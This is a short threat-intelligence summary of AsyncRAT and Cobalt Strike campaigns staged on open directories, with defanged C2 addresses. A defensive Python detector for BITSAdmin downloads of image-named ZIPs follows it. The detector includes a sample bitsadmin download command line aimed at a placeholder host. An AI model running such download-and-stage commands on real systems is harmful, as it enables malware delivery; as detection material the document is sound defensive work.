(hunt.io) Malware Delivery via Open Directories: AsyncRAT and Cobalt Strike Campaign Analysis
New analysis reveals threat actors exploiting open directories to deliver AsyncRAT and Cobalt Strike in multi-stage campaigns.
In brief - Adversaries are using exposed open directories to host and deliver malware, including AsyncRAT via BITS abuse and Cobalt Strike through Fernet-encrypted Python executables. These campaigns demonstrate how unsecured infrastructure enables sophisticated intrusions.
Technically - Campaign 1: a VBScript (xx.txt) creates temp.xml with PowerShell, abuses BITSAdmin to fetch a disguised ZIP (f.jpg) containing 9 files, then self-deletes. Campaign 2: a PyInstaller-compiled 1.exe (~10MB) uses Fernet to decrypt Cobalt Strike shellcode from a.txt and executes it in memory. The binary includes obfuscation (Base64-encoded Chinese strings, QuickSort noise code) and links to Supershell C2 (207.32.217[.]21, 121.37.21[.]229). Both campaigns leverage open directories for payload staging.
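A defender-side check for the Campaign 1 pattern, as an added example that is not code from the hunt.io report: it flags BITSAdmin download command lines whose remote URL ends in an image extension and tests whether such an image-named file is really a ZIP by its magic bytes. The sample command lines, the 203.0.113.10 host and the in-memory archive are constructed for this example.

```python
import io
import re
import zipfile
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Image extensions the report's f.jpg lure imitates; a ZIP archive with at least
# one entry starts with the local-file-header magic "PK\x03\x04".
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
ZIP_MAGIC = b"PK\x03\x04"

BITS_RE = re.compile(r"bitsadmin(?:\.exe)?\b.*?/(transfer|download|addfile)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)

def suspicious_bits_download(cmdline: str) -> bool:
    """Flag a BITSAdmin transfer whose remote URL points at an image-named file."""
    if not BITS_RE.search(cmdline):
        return False
    for url in URL_RE.findall(cmdline):
        ext = PurePosixPath(urlparse(url).path).suffix.lower()
        if ext in IMAGE_EXTS:
            return True
    return False

def disguised_zip(filename: str, data: bytes) -> bool:
    """True when a file named like an image actually carries a ZIP archive."""
    ext = PurePosixPath(filename).suffix.lower()
    return ext in IMAGE_EXTS and data[:4] == ZIP_MAGIC

def scan_cmdlines(lines):
    """Return the command lines that match the BITS-abuse pattern."""
    return [line for line in lines if suspicious_bits_download(line)]

# Constructed sample command lines (not from the original report); 203.0.113.10
# is a documentation address used as a placeholder for the open directory host.
SAMPLE_CMDLINES = [
    "bitsadmin /transfer job /download /priority high http://203.0.113.10/f.jpg C:\\Users\\Public\\f.jpg",
    "bitsadmin /list /allusers",
    "powershell -NoProfile -Command Get-Date",
]

def make_fake_lure() -> bytes:
    """Build a tiny in-memory ZIP standing in for the disguised f.jpg (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("a.txt", "placeholder")
    return buf.getvalue()
```

Call `scan_cmdlines(SAMPLE_CMDLINES)` to list the matching command line, and `disguised_zip("f.jpg", make_fake_lure())` to confirm the extension/magic mismatch.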